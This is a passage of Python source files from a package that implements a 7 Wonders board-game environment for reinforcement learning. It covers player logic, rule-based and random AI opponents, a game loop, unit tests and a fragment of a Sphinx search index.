posChoice.append(choicesIndex)
if posChoice:
return random.choice(posChoice)
zeroRes = {key: value for (key, value) in player.resource.items() if value == 0 and key != "shield"}
for choicesIndex in range(
len(options)
): # Select resource that does not have yet (0 resource) except military. If there are multiple cards, select one randomly
if isinstance(options[choicesIndex][0], Card):
for res in zeroRes.keys():
if options[choicesIndex][0].getResource["type"] == res and options[choicesIndex][3] != -1:
posChoice.append(choicesIndex)
if posChoice:
return random.choice(posChoice)
if not (
player.resource["shield"] > player.left.resource["shield"]
or player.resource["shield"] > player.right.resource["shield"]
):
for choicesIndex in range(
len(options)
): # Select military IF it makes player surpass neighbors in shield. If there are multiple cards, select one randomly
if isinstance(options[choicesIndex][0], Card):
if options[choicesIndex][0].getResource["type"] == "shield" and options[choicesIndex][3] != -1:
shieldPts = options[choicesIndex][0].getResource["amount"]
if (
player.resource["shield"] + shieldPts > player.left.resource["shield"]
or player.resource["shield"] + shieldPts > player.right.resource["shield"]
):
posChoice.append(choicesIndex)
if posChoice:
return random.choice(posChoice)
for choicesIndex in range(len(options)): # Select science card. If there are multiple cards, select one.
if isinstance(options[choicesIndex][0], Card):
if options[choicesIndex][0].color == "green" and options[choicesIndex][3] != -1:
posChoice.append(choicesIndex)
if posChoice:
return random.choice(posChoice)
for choicesIndex in range(len(options)): # Select VP (civil) card. If there are multiple cards, select one.
if isinstance(options[choicesIndex][0], Card):
if options[choicesIndex][0].getResource["type"] == "VP" and options[choicesIndex][3] != -1:
if not posChoice:
posChoice.append(choicesIndex)
elif (
options[posChoice[0]][0].getResource["amount"]
< options[choicesIndex][0].getResource["amount"]
):
posChoice = [choicesIndex]
if posChoice:
return random.choice(posChoice)
# play random non-discarded choice
return random.choice(nonDiscard)
else: # age 3. Simulate all plays, greedy by most points.
basePoints = player.endGameCal()
gainPoints = -1
selected = []
for choicesIndex in range(len(options)):
afterPlayer = deepcopy(player)
afterPlayer.hand = deepcopy(player.hand)
# print("HAND")
# print(len(afterPlayer.hand))
# print(choicesIndex)
# print(options[choicesIndex])
afterPlayer.playChosenCardFake(options[choicesIndex])
addPoints = afterPlayer.endGameCal() - basePoints
if addPoints < 0:
print("WRONG")
if addPoints > gainPoints:
selected = [choicesIndex]
gainPoints = addPoints
elif addPoints == gainPoints:
selected.append(choicesIndex)
if selected:
return random.choice(selected)
else:
return random.choice(range(len(options)))
class Human(Personality):
def __init__(self):
super().__init__()
def make_choice(self, player, age, options):
return int(stdin.readline())
class RandomAI(Personality):
def __init__(self):
super().__init__()
def make_choice(self, player, age, options):
return random.choice(range(len(options))) | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/SevenWondersEnv/SevenWonEnv/envs/mainGameEnv/Personality.py | Personality.py |
import json
import random
from operator import itemgetter
from SevenWonEnv.envs.mainGameEnv.mainHelper import (
filterPlayer,
buildCard,
rotateHand,
battle,
)
from SevenWonEnv.envs.mainGameEnv.PlayerClass import Player
from SevenWonEnv.envs.mainGameEnv.WonderClass import Wonder
from SevenWonEnv.envs.mainGameEnv.resourceClass import Resource
from SevenWonEnv.envs.mainGameEnv.Personality import RuleBasedAI
from SevenWonEnv.envs.mainGameEnv.stageClass import Stage
import sys
def init(player):
fileOper = open("Card/card_list.json", "rt")
cardList = json.load(fileOper)
cardAge = []
for i in range(1, 4):
cardAge.append(getCardAge("age_" + str(i), player, cardList))
fileOper = open("Card/wonders_list.json", "rt")
wonderList = json.load(fileOper)
wonderList = wonderList["wonders"]
wonderName = list(wonderList.keys())
random.shuffle(wonderName)
wonderSelected = wonderName[0:player]
# print(wonderSelected)
# print(wonderList['Rhodes'])
playerList = {}
for i in range(1, player + 1):
newPlayer = Player(i, player, RuleBasedAI)
side = "A" if random.randrange(2) % 2 == 0 else "B"
wonderCurName = wonderSelected[i - 1]
wonderCur = wonderList[wonderCurName]
initialResource = Resource(wonderCur["initial"]["type"], wonderCur["initial"]["amount"])
# print(type(wonderList[wonderCurName][side]))
newWonders = Wonder(wonderCurName, side, initialResource, **wonderList[wonderCurName][side])
newPlayer.assignWonders(newWonders)
playerList[i] = newPlayer
for i in range(1, player + 1):
curPlayer = playerList[i]
playerList[i].assignLeftRight(playerList[curPlayer.left], playerList[curPlayer.right])
print("SETUP COMPLETE")
return cardAge, playerList
def getCardAge(age, player, cardList):
jsonAge = filterPlayer(cardList[age], player)
cardAge = []
for color in jsonAge:
for card in jsonAge[color]:
card = buildCard(card["name"], color, card["payResource"], card["getResource"])
cardAge.append(card)
return cardAge
if __name__ == "__main__":
discarded = []
logger = open("loggers.txt", "w+")
player = input("How many players?")
player = int(player)
path = "../gameLog.txt"
sys.stdout = open(path, "w")
cardAge, playerList = init(player)
for player in playerList.keys():
print("Player {} with wonders {}".format(player, playerList[player].wonders.name))
for age in range(1, 4):
cardThisAge = cardAge[age - 1]
random.shuffle(cardThisAge)
cardShuffled = [cardThisAge[i : i + 7] for i in range(0, len(cardThisAge), 7)]
for i in range(len(cardShuffled)):
if any("freeStructure" in effect for effect in playerList[i + 1].endAgeEffect):
playerList[i + 1].freeStructure = True
playerList[i + 1].assignHand(cardShuffled[i])
for i in range(0, 6):
for j in range(len(playerList)):
# print("j" + str(j))
card, action = playerList[j + 1].playCard(age)
if action == -1: # card discarded
discarded.append(card)
print("PLAYER {} discard {}".format(j + 1, card.name))
elif isinstance(card, Stage):
print("PLAYER {} play step {}".format(j + 1, card.stage))
else:
print("PLAYER {} play {}".format(j + 1, card.name))
rotateHand(playerList, age)
for j in range(len(playerList)):
print("PLAYER {} resource".format(j + 1), end=" ")
for res in playerList[j + 1].resource:
print(res, playerList[j + 1].resource[res], end=" ")
print()
for j in range(len(playerList)):
player = playerList[j + 1]
if player.endTurnEffect == "buildDiscarded":
card, action = player.playFromEffect(discarded, player.endTurnEffect, age=age)
discarded = [disCard for disCard in discarded if disCard.name != card.name]
print("REMAINING HANDS")
for j in range(len(playerList)):
discarded.append(playerList[j + 1].hand[0])
print(playerList[j + 1].hand)
print("AGE" + str(age))
for j in range(len(playerList)):
playerList[j + 1].printPlayer()
# military conflict
for j in range(1, 1 + len(playerList)):
battle(playerList[j], playerList[j % len(playerList) + 1], age)
# end game period
endScore = []
for i in range(len(playerList)):
endScore.append((i + 1, playerList[i + 1].endGameCal()))
endScore = sorted(endScore, key=itemgetter(1), reverse=True)
print("SCOREBOARD")
for i in endScore:
print("Player {} with score {}".format(i[0], i[1])) | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/SevenWondersEnv/SevenWonEnv/envs/mainGameEnv/main.py | main.py |
from SevenWonEnv.envs.mainGameEnv.resourceClass import Resource
from SevenWonEnv.envs.mainGameEnv.cardClass import Card
from SevenWonEnv.envs.mainGameEnv.stageClass import Stage
from SevenWonEnv.envs.mainGameEnv import mainHelper
import operator
class ResourceBFS:
def __init__(self, accuArr, remainArr):
self.accuArr = accuArr
self.remainArr = remainArr
class Player:
def __init__(self, playerNumber, totalPlayer, person):
self.player = playerNumber
self.card = []
self.choosecard = []
self.chooseStage = []
self.coin = 3
self.warVP = 0
self.warLoseVP = 0
self.color = dict.fromkeys(["brown", "grey", "blue", "yellow", "red", "green", "purple"], 0)
self.eastTradePrices = dict.fromkeys(["wood", "clay", "ore", "stone", "papyrus", "glass", "loom"], 2)
self.westTradePrices = self.eastTradePrices.copy()
self.resource = dict.fromkeys(
[
"wood",
"clay",
"ore",
"stone",
"papyrus",
"glass",
"loom",
"compass",
"wheel",
"tablet",
"shield",
],
0,
)
self.VP = 0
self.wonders = None
self.left = (playerNumber - 2) % totalPlayer + 1
self.right = playerNumber % totalPlayer + 1
self.hand = []
self.lastPlayColor = None
self.lastPlayEffect = None
self.endAgeEffect = []
self.endGameEffect = []
self.personality = person
self.freeStructure = False
self.endTurnEffect = None
def assignPersonality(self, personality):
self.personality = personality
def assignWonders(self, wonder):
self.wonders = wonder
beginRes = wonder.beginResource
self.resource[beginRes.resource] += beginRes.amount
def assignLeftRight(self, leftPlayer, rightPlayer):
self.left = leftPlayer
self.right = rightPlayer
def printPlayer(self):
print(self.__dict__)
self.wonders.printWonder()
for card in self.card:
print(card.name, end=" ")
def assignHand(self, hand):
self.hand = hand
def cardExist(self, name):
for singleCard in self.card:
if singleCard.name == name:
return True
return False
def resourceExist(self, resourceType): # Use in case of neighbor Player
if self.resource[resourceType] > 0:
return True
for card in self.choosecard:
for choose in card.getResource["resource"]:
if choose["type"] == resourceType:
return True
return False
def checkLeftRight(self, amount, resourceType):
leftPrice = self.westTradePrices[resourceType]
rightPrice = self.eastTradePrices[resourceType]
minPrice = 10000000
side = "M"
if self.coin >= leftPrice * amount and self.left.resourceExist(resourceType):
minPrice = leftPrice * amount
side = "L"
if self.coin >= rightPrice * amount and self.right.resourceExist(resourceType):
if minPrice > rightPrice * amount:
minPrice = rightPrice * amount
side = "R"
if side == "M":
return -1, side
return minPrice, side
def addiResComp(self, targetArr, curResArr):
# print("BEFORE")
# for i in targetArr:
# i.printResource()
for res in curResArr:
name = res.resource
# print("Name" + name)
for tar in targetArr:
if name == tar.resource:
tar.amount -= res.amount
targetArr = [i for i in targetArr if i.amount > 0]
# print("AFTER")
# for i in targetArr:
# i.printResource()
return targetArr
def BFS(self, targetArray, resourceArray):
queue = []
minLeft = 10000000
minRight = 10000000
queue.append(ResourceBFS([], resourceArray))
while queue:
left = 0
right = 0
price = -1
side = "M"
# print(queue[0])
qFront = queue[0]
curRes = qFront.accuArr
# print(curRes)
remainRes = qFront.remainArr
# print("REMAINRES")
# print(remainRes)
remainArr = self.addiResComp(targetArray[:], curRes[:])
for remain in remainArr:
price, side = self.checkLeftRight(remain.amount, remain.resource)
if price == -1:
break
if side == "L":
left += price
elif side == "R":
right += price
if price != -1 and left + right < minLeft + minRight:
minLeft = left
minRight = right
queue.pop(0)
if remainRes:
resChooseCard = remainRes[0]
for res in resChooseCard.getResource["resource"]:
# print("RES")
# print(res)
selectRes = mainHelper.resBuild(res)
newResAccu = curRes[:]
newResAccu.append(selectRes)
# print('NewResAccu : {}'.format(newResAccu))
newRemRes = remainRes[1:]
if newRemRes is None:
newRemRes = []
queue.append(ResourceBFS(newResAccu, newRemRes))
return minLeft, minRight
def playable(self, card):
# if isinstance(card,Stage):
# print("IN STAGE")
# print(card.payResource)
# print("--------------")
# print(card.payResource)
payRes = card.payResource
if payRes["type"] == "choose":
if self.cardExist(payRes["resource"][0]["name"]):
return 0, 0
else:
payRes = payRes["resource"][1]
# print("NEW PAYRES-----")
# print(payRes)
if payRes["type"] == "none":
return 0, 0
elif payRes["type"] == "coin":
if self.coin >= payRes["amount"]:
return 0, 0
else:
return -1, -1
else:
missResource = {}
if payRes["type"] == "mixed":
for res in payRes["resource"]:
if self.resource[res["type"]] < res["amount"]:
missResource[res["type"]] = res["amount"] - self.resource[res["type"]]
else:
res = payRes
if self.resource[res["type"]] < res["amount"]:
missResource[res["type"]] = res["amount"] - self.resource[res["type"]]
if len(missResource) == 0:
return 0, 0
missResource = dict(sorted(missResource.items(), key=operator.itemgetter(1), reverse=True))
# print("oldMissResource")
# print(missResource)
missArr = []
for name, amount in missResource.items():
missArr.append(Resource(name, amount))
left, right = self.BFS(missArr, self.choosecard + self.chooseStage)
if self.coin >= left + right:
return left, right
else:
return -1, -1
def findCardFromHand(self, cardName):
for card in self.hand:
if card.name == cardName:
return card
return None
def activateEffect(self, effect):
if effect == "freeStructure":
self.freeStructure = True
self.endAgeEffect.append(effect)
elif effect == "playSeventhCard":
self.endAgeEffect.append(effect)
elif effect == "buildDiscarded":
self.endTurnEffect = effect
elif effect == "sideTradingRaws":
self.activateEffect("eastTradingRaws")
self.activateEffect("westTradingRaws")
elif effect == "eastTradingRaws":
self.eastTradePrices["wood"] = 1
self.eastTradePrices["clay"] = 1
self.eastTradePrices["ore"] = 1
self.eastTradePrices["stone"] = 1
elif effect == "westTradingRaws":
self.westTradePrices["wood"] = 1
self.westTradePrices["clay"] = 1
self.westTradePrices["ore"] = 1
self.westTradePrices["stone"] = 1
elif effect == "sideManuPosts":
self.eastTradePrices["papyrus"] = 1
self.eastTradePrices["glass"] = 1
self.eastTradePrices["loom"] = 1
self.westTradePrices["papyrus"] = 1
self.westTradePrices["glass"] = 1
self.westTradePrices["loom"] = 1
elif effect == "threeBrownOneCoin":
self.coin += self.left.color["brown"] + self.color["brown"] + self.right.color["brown"]
elif effect == "brownOneCoinOneVP":
self.coin += self.color["brown"]
self.endGameEffect.append(effect)
elif effect == "yellowOneCoinOneVP":
self.coin += self.color["yellow"]
self.endGameEffect.append(effect)
elif effect == "stageThreeCoinOneVP":
self.coin += self.wonders.stage * 3
self.endGameEffect.append(effect)
elif effect == "greyTwoCoinTwoVP":
self.coin += self.color["grey"] * 2
self.endGameEffect.append(effect)
else: # effect == "sideBrownOneVP","sideGreyTwoVP","sideYellowOneVP","sideGreenOneVP","sideRedOneVP",
# "sideDefeatOneVP","brownGreyPurpleOneVP", "brownOneCoinOneVP", "yellowOneCoinOneVP", "stageThreeCoinOneVP",
# "greyTwoCoinTwoVP","copyPurpleNeighbor"
self.endGameEffect.append(effect)
def VPFromSide(self, col, mult):
return (self.left.color[col] + self.right.color[col]) * mult
def VPFromEffect(self, effect):
if effect == "sideBrownOneVP":
return self.VPFromSide("brown", 1)
elif effect == "sideGreyTwoVP":
return self.VPFromSide("grey", 2)
elif effect == "sideYellowOneVP":
return self.VPFromSide("yellow", 1)
elif effect == "sideGreenOneVP":
return self.VPFromSide("green", 1)
elif effect == "sideRedOneVP":
return self.VPFromSide("red", 1)
elif effect == "sideDefeatOneVP":
return self.left.warLoseVP + self.right.warLoseVP
elif effect == "brownGreyPurpleOneVP":
return self.color["brown"] + self.color["grey"] + self.color["purple"]
elif effect == "brownOneCoinOneVP":
return self.color["brown"]
elif effect == "yellowOneCoinOneVP":
return self.color["yellow"]
elif effect == "stageThreeCoinOneVP":
return self.wonders.stage
elif effect == "greyTwoCoinTwoVP":
return self.color["grey"] * 2
else:
return 0
def scienceVP(self, chooseScience):
maxScience = 0
compass = self.resource["compass"]
wheel = self.resource["wheel"]
tablet = self.resource["tablet"]
if chooseScience == 0:
return compass**2 + wheel**2 + tablet**2 + min(compass, wheel, tablet) * 7
for addCom in range(0, chooseScience):
for addWheel in range(0, chooseScience - addCom):
addTab = chooseScience - addCom - addWheel
compass = addCom + self.resource["compass"]
wheel = addWheel + self.resource["wheel"]
tablet = addTab + self.resource["tablet"]
points = compass**2 + wheel**2 + tablet**2 + min(compass, wheel, tablet) * 7
if points > maxScience:
maxScience = points
return maxScience
def endGameCal(self):
extraPoint = 0
# print("Player" + str(self.player))
# print("Before" + str(self.VP))
# military
extraPoint += self.warVP - self.warLoseVP
# print("War : " + str(self.warVP - self.warLoseVP))
# coin : 3coins -> 1VP
extraPoint += int(self.coin / 3)
# print("Coin : " + str(int(self.coin/3)))
# wonders VP are automatically added when wonders are played
# effect cards activation
copyPurple = False
for effect in self.endGameEffect:
if effect == "copyPurpleNeighbor":
copyPurple = True
else:
extraPoint += self.VPFromEffect(effect)
maxCopy = 0
scienceNeighbor = False
if copyPurple:
purple = []
for card in self.left.card:
if card.color == "purple":
purple.append(card)
for card in self.right.card:
if card.color == "purple":
purple.append(card)
maxPt = 0
for card in purple:
if card.name == "scientists guild":
scienceNeighbor = True
else:
if maxPt < self.VPFromEffect(card.getResource["effect"]):
maxPt = self.VPFromEffect(card.getResource["effect"])
maxCopy = maxPt
# science points
chooseScience = 0
for card in self.choosecard:
if card.getResource["type"] == "choose" and card.getResource["resource"][0]["type"] == "compass":
chooseScience += 1
for i in range(0, self.wonders.stage):
if (
self.wonders.step[i + 1].getResource["type"] == "choose"
and self.wonders.step[i + 1].getResource["resource"][0]["type"] == "compass"
):
chooseScience += 1
maxScience = self.scienceVP(chooseScience)
if scienceNeighbor:
copyScience = self.scienceVP(chooseScience + 1)
if maxScience + maxCopy < copyScience:
maxScience = copyScience
# print("Science : " + str(maxScience))
extraPoint += maxScience
return self.VP + extraPoint
def deleteCardFromHand(self, card):
if any(cardExist for cardExist in self.hand if cardExist.name == card.name):
self.hand.remove(card)
return 1
else:
return -1
def addedCardSys(self, cardGetResource, selectedCard):
if cardGetResource["type"] == "choose":
if isinstance(selectedCard, Stage):
self.chooseStage.append(selectedCard)
else:
self.choosecard.append(selectedCard)
elif cardGetResource["type"] == "VP":
self.VP += cardGetResource["amount"]
elif cardGetResource["type"] == "coin":
self.coin += cardGetResource["amount"]
elif cardGetResource["type"] != "effect":
self.resource[cardGetResource["type"]] += cardGetResource["amount"]
else:
self.activateEffect(cardGetResource["effect"])
self.lastPlayEffect = cardGetResource["effect"]
return
def playChosenCard(self, selectedCard):
self.lastPlayEffect = None
leftPrice = selectedCard[1]
rightPrice = selectedCard[2]
action = selectedCard[3]
stage = None
if len(selectedCard) == 5:
stage = selectedCard[4]
selectedCard = selectedCard[0]
if action == -1:
# print("SELECT")
# if isinstance(selectedCard,Card):
# print(selectedCard.name)
# else:
# print(selectedCard.stage)
status = self.deleteCardFromHand(selectedCard)
if not status:
print("ERROR STATUS")
self.coin += 3
return selectedCard, action
elif action == 1:
self.freeStructure = False
if isinstance(selectedCard, Card):
# print(selectedCard.name)
status = self.deleteCardFromHand(selectedCard)
self.card.append(selectedCard)
self.color[selectedCard.color] += 1
self.lastPlayColor = selectedCard.color
elif action == 2:
status = self.deleteCardFromHand(selectedCard)
self.wonders.stage += 1
# print(self.wonders.name)
# print(self.wonders.step[self.wonders.stage].printCard())
if selectedCard.getResource["type"] == "mixed":
for resource in selectedCard.getResource["resource"]:
if resource["type"] == "mixed":
for innerRes in resource["resource"]:
self.addedCardSys(innerRes, selectedCard)
else:
# print(resource["type"])
self.addedCardSys(resource, selectedCard)
elif selectedCard.getResource["type"] == "choose":
if isinstance(stage, Stage):
self.chooseStage.append(stage)
else:
self.choosecard.append(selectedCard)
else:
self.addedCardSys(selectedCard.getResource, selectedCard)
return selectedCard, action
def playChosenCardFake(self, selectedCard):
self.lastPlayEffect = None
leftPrice = selectedCard[1]
rightPrice = selectedCard[2]
action = selectedCard[3]
stage = None
if len(selectedCard) == 5:
stage = selectedCard[4]
selectedCard = selectedCard[0]
if action == -1:
# print("SELECT")
# if isinstance(selectedCard,Card):
# print(selectedCard.name)
# else:
# print(selectedCard.stage)
# self.deleteCardFromHand(selectedCard)
self.coin += 3
return selectedCard, action
elif action == 1:
self.freeStructure = False
if isinstance(selectedCard, Card):
# print(selectedCard.name)
# self.deleteCardFromHand(selectedCard)
self.card.append(selectedCard)
self.color[selectedCard.color] += 1
self.lastPlayColor = selectedCard.color
elif action == 2:
# self.deleteCardFromHand(stageCard)
self.wonders.stage += 1
# print(self.wonders.name)
# print(self.wonders.step[self.wonders.stage].printCard())
if selectedCard.getResource["type"] == "mixed":
for resource in selectedCard.getResource["resource"]:
if resource["type"] == "mixed":
for innerRes in resource["resource"]:
self.addedCardSys(innerRes, selectedCard)
else:
# print(resource["type"])
self.addedCardSys(resource, selectedCard)
elif selectedCard.getResource["type"] == "choose":
if isinstance(selectedCard, Stage):
self.chooseStage.append(stage)
else:
self.choosecard.append(selectedCard)
else:
self.addedCardSys(selectedCard.getResource, selectedCard)
return selectedCard, action
def playFromEffect(self, cardList, effect, age): # playSeventhCard or buildDiscarded
if effect == "playSeventhCard":
card = cardList[0]
choices = []
choices.append([card, 0, 0, -1])
left, right = self.playable(card)
if left != -1 and right != -1:
choices.append([card, left, right, 0])
steps = self.wonders.step
# print("LEN STEPS : {}".format(len(steps)))
existedStage = self.wonders.stage + 1
# print(type(steps[existedStage]))
if existedStage < len(steps):
left, right = self.playable(steps[existedStage])
if left != -1 and right != -1:
for card in self.hand:
choices.append([card, left, right, 2, steps[existedStage]])
# print("APPENDED STAGES")
persona = self.personality
selectedCard = choices[persona.make_choice(self=persona, player=self, age=age, options=choices)]
return self.playChosenCard(selectedCard)
elif effect == "buildDiscarded":
choices = []
for card in cardList:
choices.append([card, 0, 0, 0])
persona = self.personality
selectedCard = choices[persona.make_choice(self=persona, player=self, age=age, options=choices)]
self.hand.append(selectedCard[0])
return self.playChosenCard(selectedCard)
else:
print("something wrong")
exit(-1)
def playCard(self, age):
self.lastPlayEffect = None
self.endTurnEffect = None
choices = []
for card in self.hand:
choices.append([card, 0, 0, -1]) # -1 for discard card
for card in self.hand:
left, right = self.playable(card)
if left != -1 and right != -1:
choices.append([card, left, right, 0]) # card,leftPrice,rightPrice,0 for not using free effect
if self.freeStructure == True:
for card in self.hand:
choices.append([card, 0, 0, 1]) # card,leftPrice,rightPrice,1 for using free effect
steps = self.wonders.step
existedStage = self.wonders.stage + 1
if existedStage < len(steps):
left, right = self.playable(steps[existedStage])
if left != -1 and right != -1:
for card in self.hand:
choices.append([card, left, right, 2, steps[existedStage]]) # Append Stage
persona = self.personality
selectedCard = choices[persona.make_choice(self=persona, player=self, age=age, options=choices)]
print("SELECT", selectedCard)
return self.playChosenCard(selectedCard) | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/SevenWondersEnv/SevenWonEnv/envs/mainGameEnv/PlayerClass.py | PlayerClass.py |
from SevenWonEnv.envs.mainGameEnv.mainHelper import (
filterPlayer,
buildCard,
rotateHand,
battle,
)
from SevenWonEnv.envs.mainGameEnv.PlayerClass import Player
from SevenWonEnv.envs.mainGameEnv.WonderClass import Wonder
from SevenWonEnv.envs.mainGameEnv.resourceClass import Resource
from SevenWonEnv.envs.mainGameEnv.Personality import (
Personality,
RandomAI,
RuleBasedAI,
Human,
DQNAI,
)
from SevenWonEnv.envs.mainGameEnv.stageClass import Stage
from SevenWonEnv.envs.mainGameEnv.cardClass import Card
from SevenWonEnv.envs.SevenWonderEnv import SevenWonderEnv
import gymnasium as gym
import unittest
from unittest import mock
# Unit Testing
class Test(unittest.TestCase):
def test_AddNoPlayer(self):
with mock.patch.object(SevenWonderEnv, "__init__", lambda sel, player: None):
env = SevenWonderEnv(player=4)
env.unAssignedPersonality = 4
with self.assertRaises(SystemExit) as cm:
env.step(0)
exc = cm.exception
assert exc.code == "Program Stopped : Some Players do not have personality."
def test_AddTooManyPlayer(self):
with mock.patch.object(SevenWonderEnv, "__init__", lambda sel, player: None):
env = SevenWonderEnv(player=4)
env.unAssignedPersonality = 0
env.player = 4
env.playerList = []
with self.assertRaises(SystemExit) as cm:
env.setPersonality([Human])
exc = cm.exception
assert exc.code == "Program Stopped : Add too many players' personality"
def test_GetCardAge(self):
with mock.patch.object(SevenWonderEnv, "__init__", lambda sel, player: None):
env = SevenWonderEnv(player=3)
cardList = {
"age_1": {
"3players": {
"brown": [
{
"name": "lumber yard",
"payResource": {"type": "none"},
"getResource": {"type": "wood", "amount": 1},
}
]
}
}
}
result = env.getCardAge("age_1", 3, cardList)
assert result[0].name == "lumber yard"
assert result[0].color == "brown"
assert result[0].getResource == {"type": "wood", "amount": 1}
assert result[0].payResource == {"type": "none"}
def testBattle(self):
with mock.patch.object(Player, "__init__", lambda se, playNum, totNum, person: None):
p1 = Player(0, 4, Human)
p2 = Player(0, 4, Human)
p1.resource = {}
p2.resource = {}
p1.resource["shield"] = 0
p2.resource["shield"] = 1
p1.warVP = 0
p2.warVP = 0
battle(p1, p2, age=1)
assert p1.warVP == -1
assert p2.warVP == 1
p1.warVP = 0
p2.warVP = 0
battle(p1, p2, age=2)
assert p1.warVP == -1
assert p2.warVP == 3
p1.resource["shield"] = 1
battle(p1, p2, age=3)
assert p1.warVP == -1
assert p2.warVP == 3
def testAssignWonders(self):
with mock.patch.object(Wonder, "__init__", lambda se, name, side, begin: None):
won = Wonder("Rhodes", "A", Resource("wood", 2))
won.beginResource = Resource("wood", 2)
player = Player(1, 4, Human)
player.assignWonders(won)
assert player.resource["wood"] == 2
# Integration Testing
def testInitGameWithAI(self):
env = SevenWonderEnv(player=4)
env.setPersonality([RuleBasedAI, RuleBasedAI, RuleBasedAI, RuleBasedAI])
assert env.player == 4
assert env.unAssignedPersonality == 0
for i in range(1, 5):
assert len(env.playerList[i].hand) == 7
def testStepGameWithAI(self):
env = SevenWonderEnv(player=4)
env.setPersonality([RuleBasedAI, RuleBasedAI, RuleBasedAI, RuleBasedAI])
assert env.player == 4
assert env.unAssignedPersonality == 0
for i in range(1, 5):
assert len(env.playerList[i].hand) == 7
rewardAll = env.step(0)
assert len(rewardAll) == 4
assert len(rewardAll[0]) == 4
state = env.reset()
assert len(state) == 70
if __name__ == "__main__":
unittest.main() | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/SevenWondersEnv/SevenWonEnv/envs/Test/allTests.py | allTests.py |
Search.setIndex({"docnames": ["index"], "filenames": ["index.rst"], "titles": ["Welcome to 7Wonder-RL-Lib\u2019s documentation!"], "terms": {"index": 0, "modul": 0, "search": 0, "page": 0, "master": [], "file": [], "creat": [], "sphinx": [], "quickstart": [], "wed": [], "mai": [], "10": [], "21": [], "53": [], "31": [], "2023": [], "you": [], "can": 0, "adapt": [], "thi": 0, "complet": [], "your": 0, "like": [], "should": 0, "least": [], "contain": 0, "root": [], "toctre": [], "direct": [], "maxdepth": [], "2": 0, "caption": [], "content": [], "class": 0, "sevenwonenv": 0, "env": 0, "sevenwonderenv": 0, "player": 0, "close": 0, "after": 0, "user": 0, "ha": 0, "finish": 0, "us": 0, "environ": 0, "code": 0, "necessari": 0, "clean": 0, "up": 0, "i": 0, "critic": 0, "render": 0, "window": 0, "databas": 0, "http": 0, "connect": 0, "legalact": 0, "playernum": 0, "given": 0, "number": 0, "return": 0, "all": 0, "legal": 0, "action": 0, "list": 0, "param": [], "int": [], "mode": 0, "human": 0, "comput": 0, "frame": 0, "specifi": 0, "render_mod": 0, "dure": 0, "initi": 0, "The": 0, "metadata": 0, "possibl": 0, "wai": 0, "implement": 0, "In": 0, "addit": 0, "version": 0, "most": 0, "achiev": 0, "through": 0, "gymnasium": 0, "make": 0, "which": 0, "automat": 0, "appli": 0, "wrapper": 0, "collect": 0, "note": 0, "As": 0, "known": 0, "__init__": 0, "object": 0, "state": 0, "initialis": 0, "By": 0, "convent": 0, "none": 0, "default": 0, "continu": 0, "current": 0, "displai": 0, "termin": 0, "usual": 0, "consumpt": 0, "occur": 0, "step": 0, "doesn": 0, "t": 0, "need": 0, "call": 0, "rgb_arrai": 0, "singl": 0, "repres": 0, "A": 0, "np": 0, "ndarrai": 0, "shape": 0, "x": 0, "y": 0, "3": 0, "rgb": 0, "valu": 0, "an": 0, "pixel": 0, "imag": 0, "ansi": 0, "string": 0, "str": 0, "stringio": 0, "style": 0, "text": 0, "represent": 0, "each": 0, "time": 0, "includ": 0, "newlin": 0, "escap": 0, "sequenc": 0, "e": 0, "g": 0, "color": 0, "rgb_array_list": 0, "ansi_list": 0, "base": 0, "ar": 0, "except": 0, "rendercollect": 0, "pop": 0, "reset": 0, "sure": 0, "kei": 0, "support": 0, "chang": 0, "0": 0, "25": 0, "function": 0, "wa": 0, "longer": 0, "accept": 0, "paramet": 0, "rather": 0, "cartpol": 0, "v1": 0, "seed": 0, "option": 0, "episod": 0, "setperson": 0, "personalitylist": 0, "set": 0, "person": 0, "proce": 0, "one": 0, "turn": 0, "game": 0, "tupl": 0, "posit": 0, "1": 0, "n": 0, "arg": 0, "actioncod": 0, "id": 0, "random": 0, "new_stat": 0, "reward": 0, "done": 0, "info": 0, "librari": 0, "provid": 0, "test": 0, "reinforc": 0, "learn": 0, "7": 0, "wonder": 0, "There": 0, "multipl": 0, "ai": 0, "howev": 0, "now": 0, "mostli": 0, "cover": 0, "onli": 0, "tradit": 0, "board": 0, "go": 0, "chess": 0, "etc": 0, "52": 0, "card": 0, "poker": 0, "rummi": 0, "where": 0, "do": 0, "realli": 0, "have": 0, "interact": 0, "other": 0, "euro": 0, "good": 0, "algorithm": 0, "mani": 0, "aspect": 0, "explor": 0, "trade": 0, "deal": 0, "imperfect": 0, "inform": 0, "stochast": 0, "element": 0, "introduc": 0, "mention": 0, "abov": 0, "out": 0, "new": 0, "basic": 0, "system": 0, "allow": 0, "custom": 0, "space": 0, "To": 0, "gym": 0, "run": 0, "pip": [], "sevenwondersenv": 0, "exampl": 0, "how": 0, "declar": 0, "below": 0, "import": 0, "from": 0, "maingameenv": 0, "4": 0, "randomai": 0, "rulebasedai": 0, "dqnai": 0, "append": 0, "rang": 0, "statelist": 0, "variabl": 0, "consist": 0, "depend": 0, "add": 0, "model": 0, "py": 0, "main": 0, "init": 0, "make_choic": 0, "For": 0, "take": 0, "choic": 0, "randomli": 0, "choos": 0, "def": 0, "self": 0, "super": 0, "ag": 0, "len": 0, "develop": 0, "build": 0}, "objects": {"SevenWonEnv.envs": [[0, 0, 0, "-", "SevenWonderEnv"]], "SevenWonEnv.envs.SevenWonderEnv": [[0, 1, 1, "", "SevenWonderEnv"]], "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv": [[0, 2, 1, "", "close"], [0, 2, 1, "", "legalAction"], [0, 2, 1, "", "render"], [0, 2, 1, "", "reset"], [0, 2, 1, "", "setPersonality"], [0, 2, 1, "", "step"]]}, "objtypes": {"0": "py:module", "1": "py:class", "2": "py:method"}, "objnames": {"0": ["py", "module", "Python module"], "1": ["py", "class", "Python class"], "2": ["py", "method", "Python method"]}, "titleterms": {"welcom": 0, "7wonder": 0, "rl": 0, "lib": 0, "": 0, "document": 0, "indic": 0, "tabl": 0, "readm": 0, "file": 0, "overview": 0, "instal": 0, "usag": 0}, "envversion": {"sphinx.domains.c": 2, "sphinx.domains.changeset": 1, "sphinx.domains.citation": 1, "sphinx.domains.cpp": 8, "sphinx.domains.index": 1, 